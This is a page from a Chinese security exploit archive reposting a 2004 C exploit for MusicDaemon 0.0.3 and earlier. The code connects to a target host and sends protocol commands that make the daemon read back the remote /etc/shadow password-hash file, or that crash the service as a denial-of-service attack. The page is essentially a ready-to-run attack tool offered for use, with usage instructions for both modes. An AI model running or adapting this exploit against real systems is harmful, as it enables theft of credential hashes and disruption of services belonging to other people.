首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MusicDaemon<=0.0.3/etc/shadow Stealer / DoS Exp
来源:vfocus.net 作者:Tal0n 发布时间:2004-08-24  

MusicDaemon <= 0.0.3 /etc/shadow Stealer / DoS Exploit


#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

int main(int argc, char *argv[]) {

char buffer[16384];

char *xpldata1 = "LOAD /etc/shadow\r\n";
char *xpldata2 = "SHOWLIST\r\n";
char *xpldata3 = "CLEAR\r\n";
char *dosdata1 = "LOAD /bin/cat\r\n";
char *dosdata2 = "SHOWLIST\r\n";
char *dosdata3 = "CLEAR\r\n";

int len1 = strlen(xpldata1);
int len2 = strlen(xpldata2);
int len3 = strlen(xpldata3);
int len4 = strlen(dosdata1);
int len5 = strlen(dosdata2);
int len6 = strlen(dosdata3);

if(argc != 4) {
printf("\nMusicDaemon <= 0.0.3 Remote /etc/shadow
Stealer / DoS");
printf("\nDiscovered and Coded by: Tal0n
05-22-04\n");
printf("\nUsage: %s <host> <port> <option>\n",
argv[0]);
printf("\nOptions:");
printf("\n\t\tshadow - Steal /etc/shadow file");
printf("\n\t\tdos - DoS Music Daemon\n\n");
return 0; }

printf("\nMusicDaemon <= 0.0.3 Remote /etc/shadow
Stealer / DoS\n\n");

int sock;
struct sockaddr_in remote;

remote.sin_family = AF_INET;
remote.sin_port = htons(atoi(argv[2]));
remote.sin_addr.s_addr = inet_addr(argv[1]);

if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
printf("\nError: Can't create socket!\n\n");
return -1; }

if(connect(sock,(struct sockaddr *)&remote,
sizeof(struct sockaddr)) < 0) {
printf("\nError: Can't connect to %s:%s!\n\n",
argv[1], argv[2]);
return -1; }

printf("Connected to %s:%s...\n", argv[1], argv[2]);

if(strcmp(argv[3], "dos") == 0) {

printf("Sending DoS data...\n");

send(sock, dosdata1, len4, 0);

sleep(2);

send(sock, dosdata2, len5, 0);

sleep(2);

send(sock, dosdata3, len6, 0);

printf("\nTarget %s DoS'd!\n\n", argv[1]);

return 0; }

if(strcmp(argv[3], "shadow") == 0) {

printf("Sending exploit data...\n");

send(sock, xpldata1, len1, 0);

sleep(2);

send(sock, xpldata2, len2, 0);

sleep(5);

printf("Done! Grabbing /etc/shadow...\n");

memset(buffer, 0, sizeof(buffer));
read(sock, buffer, sizeof(buffer));

sleep(2);

printf("\n<*** /etc/shadow file from %s ***>\n\n",
argv[1]);
printf("%s", buffer);
printf("\n<*** End /etc/shadow file ***>\n\n");

send(sock, xpldata3, len3, 0);

sleep(1);

close(sock);

return 0; }

return 0; }


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PADS Simple Stack Overflow Exp
·Bird Chat 1.61 Denial Of Servi
·BadBlue v2.52 Web Server Denia
·Remote Exploit for Hafiye-1.0
·Qt 3.x bmp image parsing local
·Axis Network Camera/Video Serv
·XV v3.x bmp parsing local buff
·Squirrelmail chpasswd local Ro
·Gallery1.4.4save_photos.php PH
·Winamp<=5.04Skin File Remot
·PlaySMS version 0.7 and prior
·Gaucho Email Client Buffer Ove
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved